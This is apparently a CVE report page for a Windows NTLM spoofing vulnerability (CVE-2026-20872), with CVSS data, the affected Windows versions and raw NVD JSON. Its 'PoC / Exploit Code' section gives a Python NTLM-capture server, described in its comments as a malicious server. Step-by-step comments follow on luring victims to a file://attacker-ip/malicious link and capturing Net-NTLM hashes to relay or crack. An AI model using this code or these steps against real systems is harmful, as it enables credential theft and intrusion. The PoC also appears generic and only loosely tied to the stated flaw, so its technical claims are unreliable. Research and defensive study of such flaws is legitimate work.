Security Vulnerability Report
中文
CVE-2026-20872 CVSS 6.5 MEDIUM

CVE-2026-20872

Published: 2026-01-13 18:16:17
Last Modified: 2026-03-27 21:17:02
Source: [email protected]

Description

External control of file name or path in Windows NTLM allows an unauthorized attacker to perform spoofing over a network.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:* - VULNERABLE
Windows 10所有版本
Windows 11所有版本
Windows Server 2016
Windows Server 2019
Windows Server 2022
启用了NTLM认证的Windows系统

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-20872 PoC - NTLM路径控制欺骗攻击 # 此PoC演示如何利用Windows NTLM路径控制漏洞进行欺骗攻击 import http.server import socketserver import os import sys from urllib.parse import urlparse class NTLMCaptureHandler(http.server.BaseHTTPRequestHandler): def do_GET(self): # 记录访问信息 client_ip = self.client_address[0] print(f"[*] Connection from: {client_ip}") # 检查NTLM认证头 auth_header = self.headers.get('Authorization', '') if auth_header.startswith('NTLM'): # 提取NTLM Negotiate消息 ntlm_msg = auth_header[5:].strip() print(f"[*] NTLM Negotiate message received from {client_ip}") # 发送NTLM Challenge self.send_response(401) self.send_header('WWW-Authenticate', 'NTLM TlRMTVNTUAACAAAAAAAAACgAAAABggAAU3J2Tm93Um9yawAAAAAAAAAAAAA=') self.end_headers() self.wfile.write(b'Unauthorized') else: # 发送NTLM挑战请求 self.send_response(401) self.send_header('WWW-Authenticate', 'NTLM') self.send_header('Connection', 'close') self.send_header('Content-Type', 'text/html') self.end_headers() response = b'<html><body>401 Unauthorized</body></html>' self.wfile.write(response) def log_message(self, format, *args): # 自定义日志输出 print(f"[HTTP] {format % args}") def start_evil_server(port=8080): """启动恶意服务器捕获NTLM认证""" print(f"[*] Starting NTLM capture server on port {port}") print(f"[*] Waiting for victim connections...") with socketserver.TCPServer(("", port), NTLMCaptureHandler) as httpd: try: httpd.serve_forever() except KeyboardInterrupt: print("\n[!] Server stopped") sys.exit(0) if __name__ == "__main__": # 攻击者启动恶意服务器 # 受害者访问攻击者控制的URL时会触发NTLM认证 # 例如:file://attacker-server/share/path start_evil_server() # 攻击利用步骤说明: # 1. 攻击者部署上述恶意HTTP服务器 # 2. 构造包含恶意文件路径的链接,如 file://attacker-ip/malicious # 3. 诱导受害者访问该链接 # 4. Windows会尝试通过NTLM认证访问该路径 # 5. 攻击者捕获Net-NTLM哈希用于重放攻击或破解

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-20872", "sourceIdentifier": "[email protected]", "published": "2026-01-13T18:16:16.973", "lastModified": "2026-03-27T21:17:01.907", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "External control of file name or path in Windows NTLM allows an unauthorized attacker to perform spoofing over a network."}, {"lang": "es", "value": "Control externo del nombre de archivo o ruta en Windows NTLM permite a un atacante no autorizado realizar suplantación de identidad a través de una red."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.14393.8783", "matchCriteriaId": "9A956D23-259E-450B-8406-FEB2BBED1F39"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.14393.8783", "matchCriteriaId": "41D387B9-5E9D-47CB-B044-D7D10FFFB458"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.17763.8276", "matchCriteriaId": "DD4CBDAB-7626-4048-8474-B1BD9C1F3255"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.17763.8276", "matchCriteriaId": "A6D4C631-2CC0-407C-9ACA-7C151006598C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19044.6809", "matchCriteriaId": "1895E186-5B2E-43CC-AF1F-B5C95419D8C5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19045.6809", "matchCriteriaId": "B7CB5184-1BA1-4D71-8AE3-CF4C6B63A469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.22631.6491", "matchCriteriaId": "8D675DAA-4DCE-4727-BE5F-C954BBD252C4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.7623", "matchCriteriaId": "D249551B-1433-4E5E-A587-40F782E91E09"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26200.7623", "matchCriteriaId": "22082D4E-E68F-4E48-98FB-42DFDEE2E2A8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "matchCriteriaId": "2127D10C-B6F3-4C1D-B9AA-5D78513CC996"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "matchCriteriaId": "AB425562-C0A0-452E-AABE-F70522F15E1A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "matchCriteriaId": "AF07A81D-12E5-4B1D-BFF9-C8D08C32FF4F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "matchCriteriaId": "A7DF96F8-BA6A-4780-9CA3-F719B3F81074"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "matchCriteriaId": "DB18C4CE-5917-401E-ACF7-2747084FD36E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.14393.8783", "matchCriteriaId": "A059E609-F8D4-4246-BDAE-0AEDED1744D2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.8276", "matchCriteriaId": "A74970A1-CC81-4482-B465-8382B1544EF3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.20348.4648", "matchCriteriaId": "C4AA6991-DE34-48F6-AFD3-77CEE7FBB692"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.2092", "matchCriteriaId": "BA5947E0-C44C-4517-A307-DA79752F30A8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.32230", "matchCriteriaId": "D44880ED-E8E9-49A8-BD56-503C63D40000"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20872", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vicarius.io/vsociety/posts/cve-2026-20872-detection-script-spoofing-vulnerability-in-wind ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.